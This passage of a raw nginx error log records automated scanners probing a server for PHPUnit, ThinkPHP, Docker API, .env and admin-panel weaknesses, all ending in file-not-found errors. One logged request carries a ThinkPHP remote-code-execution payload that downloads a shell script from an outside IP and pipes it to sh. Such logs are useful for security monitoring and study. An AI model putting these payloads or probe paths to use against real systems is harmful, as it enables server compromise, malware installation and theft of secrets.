/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:30 [error] 380#380: *249586 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:37:31 [error] 380#380: *249586 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 128.140.66.63, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 21:40:28 [error] 380#380: *249589 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 22:33:07 [error] 377#377: *249629 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 23:22:02 [error] 388#388: *251163 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.193, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/18 00:03:07 [error] 389#389: *251199 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.52, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/18 00:05:46 [error] 387#387: *252692 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 00:05:58 [error] 388#388: *252693 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.52, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/18 00:27:14 [error] 388#388: *252709 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 00:51:18 [error] 388#388: *252733 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 40.74.208.9, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/18 00:59:37 [error] 389#389: *252744 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 74.249.129.4, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "91.82.83.208" +2026/01/18 01:05:56 [error] 389#389: *252747 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:06:36 [error] 389#389: *252812 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.txg.sh%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:27:59 [error] 386#386: *255809 open() "/var/www/html/login" failed (2: No such file or directory), client: 199.45.155.106, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:33 [error] 387#387: *255826 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:33 [error] 387#387: *255827 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:33 [error] 387#387: *255828 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:33 [error] 387#387: *255829 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:34 [error] 387#387: *255830 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:34 [error] 387#387: *255831 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:34 [error] 388#388: *255834 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:34 [error] 388#388: *255835 open() "/var/www/html/app_dev.php/_profiler/open" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:35 [error] 388#388: *255836 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:35 [error] 388#388: *255837 "/var/www/html/info/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /info/ HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:35 [error] 388#388: *255838 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:35 [error] 388#388: *255839 "/var/www/html/phpinfo/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /phpinfo/ HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:35 [error] 388#388: *255840 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:36 [error] 388#388: *255841 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:37 [error] 388#388: *255842 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:37 [error] 388#388: *255843 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:37 [error] 388#388: *255844 open() "/var/www/html/img/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /img/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:37 [error] 388#388: *255845 open() "/var/www/html/vendor/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /vendor/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:37 [error] 388#388: *255846 open() "/var/www/html/php-info.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /php-info.php HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:39 [error] 388#388: *255847 "/var/www/html/inf/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /inf/ HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:39 [error] 388#388: *255848 open() "/var/www/html/upload/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /upload/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:39 [error] 388#388: *255849 open() "/var/www/html/includes/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /includes/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:39 [error] 389#389: *255850 open() "/var/www/html/APPS/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /APPS/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:39 [error] 389#389: *255851 open() "/var/www/html/application/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /application/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:40 [error] 389#389: *255852 open() "/var/www/html/.config" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.config HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:40 [error] 389#389: *255853 open() "/var/www/html/doc/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /doc/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:40 [error] 389#389: *255854 open() "/var/www/html/css/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /css/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:47:40 [error] 389#389: *255855 open() "/var/www/html/framework/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /framework/.env HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:48:44 [error] 389#389: *255858 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/18 02:54:24 [error] 389#389: *255862 open() "/var/www/html/mcp" failed (2: No such file or directory), client: 45.156.128.51, server: localhost-nginx-proxy-manager, request: "POST /mcp HTTP/1.1", host: "91.82.83.208" +2026/01/18 02:54:24 [error] 389#389: *255862 open() "/var/www/html/sse" failed (2: No such file or directory), client: 45.156.128.51, server: localhost-nginx-proxy-manager, request: "GET /sse HTTP/1.1", host: "91.82.83.208" +2026/01/18 03:02:45 [error] 388#388: *257367 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:45 [error] 388#388: *257372 open() "/var/www/html/health" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /health HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:45 [error] 388#388: *257366 open() "/var/www/html/main.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:45 [error] 388#388: *257373 open() "/var/www/html/webui" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 388#388: *257385 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 388#388: *257386 open() "/var/www/html/dana-cached/hc/HostCheckerInstaller.osx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 387#387: *257986 open() "/var/www/html/+CSCOE+/logon.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /+CSCOE+/logon.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 388#388: *257992 open() "/var/www/html/human.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /human.aspx?arg12=infotech HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 387#387: *257967 open() "/var/www/html/webui" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 388#388: *258648 open() "/var/www/html/start.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:46 [error] 387#387: *258891 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 388#388: *258892 open() "/var/www/html/api/v2/about" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v2/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 388#388: *258893 open() "/var/www/html/readme.txt" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /readme.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 387#387: *258894 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 387#387: *258900 open() "/var/www/html/user" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /user HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 388#388: *258899 "/var/www/html/dashboard/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /dashboard/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 387#387: *258901 open() "/var/www/html/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 387#387: *258906 open() "/var/www/html/cgi-bin/info.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/info.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 388#388: *258907 open() "/var/www/html/index.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:47 [error] 387#387: *258908 open() "/var/www/html/geoserver/index.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /geoserver/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:48 [error] 387#387: *258909 open() "/var/www/html/webui/index.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /webui/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:48 [error] 387#387: *258910 open() "/var/www/html/Account/Login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /Account/Login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:48 [error] 387#387: *258912 open() "/var/www/html/xml/info.xml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /xml/info.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:48 [error] 387#387: *258918 open() "/var/www/html/start.cfm" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /start.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258922 open() "/var/www/html/api/v1/check-version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/v1/check-version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258923 open() "/var/www/html/fog/management/index.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /fog/management/index.php?node=client&sub=logininfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258930 open() "/var/www/html/helpdesk/WebObjects/Helpdesk.woa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258933 open() "/var/www/html/cluster/list.query" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cluster/list.query HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258934 open() "/var/www/html/admin.shtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258939 open() "/var/www/html/apps/zxtm/login.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /apps/zxtm/login.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258938 open() "/var/www/html/api/server/version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/server/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 388#388: *258940 open() "/var/www/html/login.php" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258941 open() "/var/www/html/indice.jsa" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /indice.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258948 "/var/www/html/CFIDE/componentutils/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /CFIDE/componentutils/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258950 open() "/var/www/html/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /rest/applinks/1.0/manifest HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258954 open() "/var/www/html/versa/login" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /versa/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258955 open() "/var/www/html/admin.pl" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:49 [error] 389#389: *258957 open() "/var/www/html/confluence/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:50 [error] 389#389: *258963 open() "/var/www/html/index.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:50 [error] 389#389: *258970 "/var/www/html/portal/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /portal/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:50 [error] 389#389: *258975 open() "/var/www/html/index.aspx" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /index.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:50 [error] 389#389: *258979 open() "/var/www/html/language/en-GB/en-GB.xml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /language/en-GB/en-GB.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:50 [error] 389#389: *258984 open() "/var/www/html/status" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 389#389: *258988 open() "/var/www/html/main.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /main.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 389#389: *258997 open() "/var/www/html/info.asp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /info.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 389#389: *258998 open() "/var/www/html/cgi-bin/param.cgi" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/param.cgi?get_device_conf HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 389#389: *258999 open() "/var/www/html/menu.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /menu.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 386#386: *259009 "/var/www/html/geoserver/index.html" is not found (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /geoserver/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 386#386: *259010 open() "/var/www/html/inicio.jhtml" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /inicio.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:51 [error] 386#386: *259012 open() "/var/www/html/lms/db" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /lms/db HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259020 open() "/var/www/html/admin.jsp" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /admin.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259021 open() "/var/www/html/api/version" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /api/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259019 open() "/var/www/html/dniapi/userInfos" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET /dniapi/userInfos HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/18 03:02:52 [error] 386#386: *259024 open() "/var/www/html/login/login.html" failed (2: No such file or directory), client: 172.235.168.35, server: localhost-nginx-proxy-manager, request: "GET 